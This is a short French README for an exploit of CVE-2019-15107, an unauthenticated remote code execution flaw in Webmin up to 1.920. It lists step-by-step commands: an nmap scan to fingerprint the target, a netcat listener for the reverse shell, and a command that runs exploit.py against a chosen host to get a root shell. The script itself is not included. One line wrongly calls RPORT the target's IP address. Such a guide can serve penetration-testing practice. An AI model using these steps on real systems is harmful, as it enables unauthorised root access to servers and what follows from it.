
CVE-2019–15107 - RCE non authentifiée Webmin <=1.920
Ce script Python devrait vous donner un shell root sur Webmin 1.890
Vérifier avec nmap :
nmap -sC -sV -p 10000 TARGET_IP
Résultat :
10000/tcp open http MiniServ 1.890 (Webmin httpd)
Comment utiliser cet exploit :
Étape 1 :
nc -lnvp LPORT
Étape 2 :
chmod +x exploit.py
./exploit RHOST RPORT LHOST LPORT
RHOST = la cible
RPORT = l'adresse IP de la cible (généralement 10000)
LHOST = votre machine Kali
LPORT = votre port reverse shell
Étape 3 : Obtenez un shell root !
NE PAS PORTER ATTEINTE AUX SYSTÈMES NON AUTORISÉS !!!